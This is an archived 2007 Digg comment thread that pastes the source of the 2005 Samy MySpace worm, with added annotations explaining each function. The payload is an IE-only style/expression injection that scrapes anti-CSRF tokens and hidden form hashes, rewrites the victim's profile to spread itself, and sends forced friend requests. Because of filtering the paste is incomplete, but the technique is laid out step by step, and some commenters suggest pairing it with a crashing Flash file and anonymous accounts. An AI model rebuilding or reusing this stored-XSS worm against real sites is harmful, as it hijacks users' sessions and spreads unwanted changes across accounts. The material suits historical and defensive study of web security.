<!-- The 2005 Samy MySpace worm as pasted into a Digg comment in 2007. This copy is
     NOT runnable: the poster says further down that Digg filtered HTML out of the
     comment, and the '..' / '....' runs mark where text was removed (most likely
     the eval() calls; TODO confirm against an unfiltered copy). The listing is kept
     byte for byte; only comments were added. Injection vector: a div whose style
     attribute re-reads and evaluates the div's own expr attribute through
     document.all.mycode.expr, an IE-only DOM path. Everything after expr= is the
     JavaScript payload, which (a) scrapes the victim's CSRF token from page HTML,
     (b) appends a line to the victim's own 'heroes' interest, and (c) sends a
     friend request to a fixed friendID, all via same-origin XMLHttpRequest. -->
- vermin, on 10/12/2007, -0/+6-div id=mycode style="BACKGROUND: url('....document.all.mycode.expr)')"
expr="var B=String.fromCharCode(34);
var A=String.fromCharCode(39);
// B is a double quote and A is a single quote. They are built with fromCharCode,
// presumably because the payload itself sits inside a double-quoted attribute and
// a literal quote would terminate it or trip a filter.
// getSource: returns the current page's HTML, via IE's createTextRange().htmlText
// first and otherwise via document.body.innerHTML. The property name is written as
// 'inne'+'rHTML' and wrapped in a call the paste lost; split keyword strings recur
// throughout and look like keyword-filter evasion, though nothing here says so.
function getSource(){var C;
try{var D=document.body.createTextRange();
C=D.htmlText}catch(e){}if(C){return C}else{return ..'document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');
// getData (begun above): stores the page's friendID in global M and its Mytoken
// in global L. main() below reads L, but no call to getData survives in this
// paste, so the invocation was presumably in the stripped text.
L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();
// getQueryParams / paramsToString: the loop bodies below are truncated by the
// paste ('O0)' is not valid JS). What survives of paramsToString: keys are joined
// with '&', each value goes through escape(), and every '+' and '&' in it is
// replaced; replace() with a string pattern only hits the first match, hence the
// while loops. The result is an application/x-www-form-urlencoded body.
for(var O=0;O0){N+='&'}var Q=escape(AV[P]);
while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J.onr'+'eadystatechange=BI');
// httpSend (begun above): asynchronous request on the global XHR object J;
// returns false when J is unset. The callback BI is installed through a stripped
// call built from the split string 'onr'+'eadystatechange'. Every target URL in
// this listing is a relative /index.cfm path, i.e. same origin as the profile
// page the payload runs in, so the browser attaches the victim's MySpace session
// cookies to each request automatically.
J.open(BJ,BH,true);
if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
J.setRequestHeader('Content-Length',BK.length)}J.send(BK);
return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;
// findIn (begun above): the substring of BF that follows marker BB and precedes
// BC, scanning at most 1024 chars past BB. There is no not-found handling; an
// indexOf() of -1 is used as an offset. getHiddenParameter reads a hidden form
// input's value by name (name=BG value=...). getFromURL reads a BG=... parameter;
// for 'Mytoken' the terminator is a double quote, presumably because the token is
// scraped from a quoted attribute in the HTML, for anything else it is '&'.
var S=BF.substring(R,R+1024);
return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;
if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';
var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);
var X=W.indexOf(T);
var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();
// getXMLObj (above): native XMLHttpRequest, else the two MSXML ActiveX progids,
// else false. Self-extraction starts here: AA is the page HTML and AE becomes the
// text of this div from 'mycode' up to the closing 'DIV' marker, within a
// 4096-char window, i.e. the worm's own body as it appears in the page.
var AB=AA.indexOf('m'+'ycode');
var AC=AA.substring(AB,AB+4096);
var AD=AC.indexOf('D'+'IV');
var AE=AC.substring(0,AD);
var AF;
if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');
AE=AE.replace('exp'+'r)','exp'+'r)'+A);
// The two replace() calls above put single quotes back around the java...expr)
// stretch, apparently ones the page copy no longer carries, so AE is again a
// usable attribute value. AF is the text appended to each victim's 'heroes'
// interest; it stays undefined when the worm cannot find its own source, which
// disables the propagation branch in getHome. Note that AE itself is never used
// later in this paste; presumably the stripped text appended it to AG as well,
// which is what would make the worm self-propagating.
AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;
// getHome (begun above): callback for the GET of the victim's own profile. AG is
// the current 'heroes' text located after the 'ProfileHeroes' marker (the empty
// terminator passed to findIn is another paste artifact). If that text does not
// already contain 'samy', AF is appended and the edit is sent to the preview
// step, using the Mytoken scraped from the fetched page rather than the URL.
AG=findIn(AU,'P'+'rofileHeroes','');
AG=AG.substring(61,AG.length);
if(AG.indexOf('samy')==-1){if(AF){AG+=AF;
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes';
AS['submit']='Preview';
AS['interest']=AG;
J=getXMLObj();
httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;
// postHero (begun above): callback for the preview response. Re-reads Mytoken
// from that response and lifts the server-issued 'hash' hidden field out of the
// preview form, then submits the same interest text to profile.processInterests.
// This is the CSRF lesson of the worm: a preview/confirm step and per-form
// tokens do not help once script runs in the victim's origin, because it can
// read them. 'nothing' is a callback that is not present in this paste.
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes';
AS['submit']='Submit';
AS['interest']=AG;
AS['hash']=getHiddenParameter(AU,'hash');
httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();
// main (begun above): getClientFID is not in this paste, and nothing visible here
// calls main(). Two requests are issued on separate XHR objects: J fetches the
// victim's own profile (callback getHome, the propagation path) and xmlhttp2
// fetches the add-friend form for friendID 11851658 (callback processxForm),
// which a later comment on this page identifies as the worm author's profile.
// The GET calls pass no body, so send() receives undefined.
var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');
// processxForm (begun above): pulls the 'hashcode' hidden field and Mytoken out
// of the add-friend page and POSTs the confirmation, so every victim sends the
// author a friend request. Using a second XHR object keeps this callback chain
// independent of the profile-edit chain running on J.
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}..'xmlhttp2.onr'+'eadystatechange=BI');
// httpSend2 (begun above): same as httpSend but drives xmlhttp2 instead of J.
xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"-
-/div- - notdang, on 10/12/2007, -0/+5it seems that all infected users used IE: besides document.all, "Samy, the Hero" relied on createTextRange()/htmlText and on the style attribute evaluating the div's own expr attribute, none of which worked outside IE at the time :)
- inactive, on 10/12/2007, -0/+5Skeptical at first but this is very real. Do a google search for "samy is my hero" and click a Google CACHED view. This has the offending source code in it still.. very interesting stuff..
Google search: http://www.google.com/search?q=%22samy+is+my+hero%22&hl=en&lr=&filter=0
Infected Example: http://72.14.203.104/search?q=cache:uAk_EUTi-JIJ:profile.myspace.com/index.cfm%3Ffuseaction%3Duser.viewProfile%26friendID%3D11502422%26Mytoken%3D20050725224411+%22samy+is+my+hero%22&hl=en - EnzanBlues, on 10/12/2007, -0/+2Nice. This is the kind of stuff that should always be on digg. Not lame crap like there has been more of recently.
- vermin, on 10/12/2007, -0/+2Actually come to think of it, this is a big danger with sites that rely heavily on AJAX and let users post markup that ends up running as code in other users' browsers. Script injected that way runs in the viewer's session, with the viewer's cookies and tokens: the power of server scripting in the hands of the client.
- lego1231, on 10/12/2007, -1/+3Myspace is nice to get back in touch with people from school that you otherwise wouldnt get in touch with
- chuckmo, on 10/12/2007, -0/+2I did something similar on thefacebook.com, and it landed me in Newsweek
http://chuckmo.beupout.com/blog/2005/06/i-shall-call-him-thefacebot-thefacebook-quest-origins-part-1/ - Killerah, on 10/12/2007, -0/+2Samy is awesome! We should send him money! And by "we" I mean everybody else.
- weareglass, on 10/12/2007, -0/+2What do you myspace naysayers use besides myspace, or is it nothing at all? Personally I use Myspace to promote a monthly dance night I throw, and if it weren't there I'm sure a lot less people would come. Not to mention band pages being a genius move, with bigger and bigger bands using Myspace to promote their new albums (i.e. Gang of Four)
- cessax, on 10/12/2007, -0/+1lol this is great, although he didn't get me! haha the write up of the story is hilarious...my favorite part:
"I'm now more afraid and decide I am never doing anything even near illegal ever again. To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." haha - p3ngu1n, on 10/12/2007, -0/+1http://chrisnowak.org/myspace_hack.txt
- ciphex, on 10/12/2007, -0/+1"Not online myspace dollars, but actual cash that can buy strippers. With all that money, Tom from myspace could basically do 2 chicks at once, 580 times."
hehehe.
As for the "hack"... cool. some spyware company is gonna pay this guy.
MySpace should thank him for pointing out a vulnerability, not sue him... we'll see. - vincenzothavise, on 10/12/2007, -0/+1Michael Bolton - "You know if this myspace website doesn't start giving me some friends, i could write a program that could make everyone my friend....everyone...big time."
- bvaughn, on 10/12/2007, -0/+1http://search.msn.com/results.aspx?q=site%3Amyspace.com+%22samy+is+my+hero%22&FORM=MSNH&srch_type=0
MSN Shows alot more people. - sirmalloc, on 10/12/2007, -0/+1technically this wasn't ajax as some others have said. it uses the same objects (XMLHttpRequest/MSXML2.XMLHTTP) as ajax code to make the requests, but there is no xml involved in the responses. this is simply doing a form post to myspace.
still pretty cool though. - inactive, on 10/12/2007, -1/+2Did some more research, this is the account it was adding
http://profile.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=11851658 - inactive, on 10/12/2007, -1/+2Looks like MySpace has "cleaned up" the problem, so be sure to check out the cached pages.
- Caboose101, on 10/12/2007, -0/+1Where exactly did he put the code ?
- vermin, on 10/12/2007, -0/+1Sorry about that, digg filters out html elements in the comments.
- ppss, on 10/12/2007, -0/+1this has been done before, when myspace allowed java script, By T0ast the cow, he got a nice letter from the owners
- spartan777, on 10/12/2007, -0/+1"Well, the most popular profiles on myspace pretty much consist of people with the IQ and English delivery skills of Kanye West."
too true. - agster11, on 10/12/2007, -0/+1haha thats awesome, if you guys want to have similar fun, myspace comments allow you to embed flash files. You can do quite a bit with flash files xD. I had it open google 50,000 times, successfully crashing anyone who visited the profile.
- xaph, on 10/12/2007, -0/+1This was awesome and hilarious. Tongue-in-cheek, and total geek humor.
Samy, you're my hero. - hypnotiq, on 10/12/2007, -0/+1"Myspace is nice to get back in touch with people from school that you otherwise wouldnt get in touch with"
Then why you bothering to get in touch? Who really cares about these people!
This is gonna make diggnation :) Can't wait to hear - blythe, on 10/12/2007, -0/+1after lurking around digg for a couple months, i registered JUST so i could digg this story. samy not only are you my hero, you're also my soulmate that i've been looking for!...okay, well maybe not...but he's still my hero!!
- weareglass, on 10/12/2007, -0/+1That's BS, Myspace is just as much about tech as IM services. It's about people using the internet as a tool to communicate. It allows user added content, it allows you to connect with other users. Aren't those some of the keystones of Web 2.0?
- chaoticjelly, on 10/12/2007, -0/+1Haha, this story made my day! Not only what he did, but his great comedic storytelling....
- jjafuller, on 10/12/2007, -0/+1I whipped up this t-shirt for myself. But, I made it public if anyone else wants one:
http://www.zazzle.com/products/product/product.asp?general%5Fcategory%5Fid=103001500200055451&caching=on&product%5Fid=235675854368861575&index=1 - subvertman, on 10/12/2007, -0/+1i want to see this geek's face. anyone?
- mindsinker, on 10/12/2007, -0/+15 out of 5
Hot Carls - msodrew, on 10/12/2007, -0/+1lol i wonder if that code still works.
- Dirtydog, on 10/12/2007, -0/+0That is awesome! Kudos Samy! your my hero! :-p
- Fixedamage, on 10/12/2007, -0/+0Awesome!
- imtigger2, on 10/12/2007, -0/+0I can't wait for the "Samy is my Hero" T-shirts !!
I'll wear it when my "all your base are belong to us!" shirt gets too many holes in it. - Tonyisbad, on 10/12/2007, -0/+0***** great "To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." why didn't i think of this ***** before, never even crossed my mind. I give him props, even though FX is FOX, its their cable channel version of themselves.
- h4lofourt33n, on 10/12/2007, -0/+0Good story, funny how he thinks he's going to get accosted by FOX or Myspace Tom. Gooooooooood stuff.
- Tonyisbad, on 10/12/2007, -0/+0***** great "To get my mind off of everything, I begin downloading a copy of the latest Nip/Tuck episode." why didn't i think of this ***** before, never even crossed my mind. I give him props
- ridebmx, on 10/12/2007, -0/+0if (this gets promoted to be featured on the podcast)
kevin + alex are going to laugh their @@@ off, and spill beer all over their computers - XorSystem, on 10/12/2007, -0/+0I loved it!!!! Great stuff... I hate the myspace community so much, ***** bunch of emo kids and sluts.... well.. I don't hate the sluts...
- Taromsn, on 10/12/2007, -1/+1Wait, add the flash file to the self-propagating MySpace code and you can effectively crash anyone who looks at a profile! Just use anonymizers to sign up for the account.
- kd5ftn, on 10/12/2007, -0/+0T-shirt Here: http://www.cafepress.com/blogoscoped.17990006
- kug001, on 10/12/2007, -0/+0Utterly awesome. Samy is my hero.
- Anth, on 10/12/2007, -0/+0Thats hilarious.
I want to go hack myspace now. POST requests are easy using XMLHTTPRequest. - tbrowne76, on 10/12/2007, -0/+0I think Alex and Kevin only use MySpace as a way to promote the show?? Who knows? I mean, I seriously doubt either of them would consistently participate on such a site.
- aeoo, on 10/12/2007, -0/+0Great hack! Congrats, and this one is real, I swear, there is no javascript that's making me type this now: Samy, you ARE my hero! :) I especially loved the write up. I think the write up of what happened is where half the fun is.
- koheed, on 10/12/2007, -0/+0That was a funny read. I'll drink to that guy not getting harassed by FOX or MySpace. It didn't seem like he set out to do any harm.
- supremechees, on 10/12/2007, -0/+0wtf is is myspace account. it never says. also gay